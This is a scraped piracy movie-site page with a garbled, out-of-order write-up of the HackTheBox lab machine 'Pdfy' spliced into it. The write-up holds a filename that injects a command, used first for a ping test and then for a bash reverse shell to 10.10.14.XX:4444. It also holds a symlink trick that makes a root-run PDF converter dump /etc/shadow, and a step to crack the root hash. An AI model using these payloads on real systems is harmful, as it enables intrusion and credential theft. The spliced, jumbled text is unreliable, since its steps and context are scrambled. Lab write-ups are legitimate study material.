Pdfy Htb Writeup

Htb Writeup — Pdfy

Jalshamoviez is the best website if you insist on watching the vast majority of movies for free. Almost any type of movie is available for download in Hindi, Bengali, and English on jalshamoviez.
OTT Apps Files
Netflix | Dinney+Hotstar | Amazon Prime | Amazon MiniTV | Hoichoi | SonyLIV | Voot | ZEE5 | ALTBalaji | MX Player | Viu | TVF | HBO Max | AddaTimes | ErosNow | AppleTV | KLiKK | Discovery+ | Paramount
Hot Short Film OTT Apps Files

Htb Writeup — Pdfy

mv shell.pdf "shell.pdf; bash -c 'bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1'" Upload → listener catches shell as www-data . Enumeration as www-data Check sudo rights:

sudo -l User www-data can run /usr/local/bin/pdfy as root without password. Running /usr/local/bin/pdfy asks for a PDF filename and converts it. It uses a system call to pdftotext – but with no sanitization. Exploitation Create a symlink to /etc/shadow as a PDF:

ln -s /etc/shadow shadow.pdf Run:

Crack root hash with John the Ripper:

sudo /usr/local/bin/pdfy Enter shadow.pdf → outputs /etc/shadow as text. Pdfy Htb Writeup

gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Found: /uploads , /index.php The PDF converter likely uses a command-line tool like pdftotext . A command injection vulnerability exists in the filename handling. Test Injection Create a simple PDF and rename it to:

mv test.pdf "test.pdf; ping -c 4 10.10.14.XX" Upload the file. A ping request is received on attacker machine → command injection confirmed. Rename PDF to: mv shell

Directory scan:

Latest Updated Movies
Pdfy Htb Writeup The Mask of Zorro (1998) Hindi Dubbed Hollywood Hindi Dubbed Movies (1990-1999) [BluRay - Mp4] Added
Select Categories
Popular Web-Series Download
© Powered By (JalshamoviezHD)
JalshamoviezHD.com (2017 - 2026) ™
All Right Reserved
Pc 720p 480p Movies Download, 720p Bollywood Movies Download, 720p Hollywood Hindi Dubbed Movies Download, 720p 480p South Indian Hindi Dubbed Movies Download, Hollywood Bollywood Hollywood Hindi 720p Movies Download, Bollywood 720p Pc Movies Download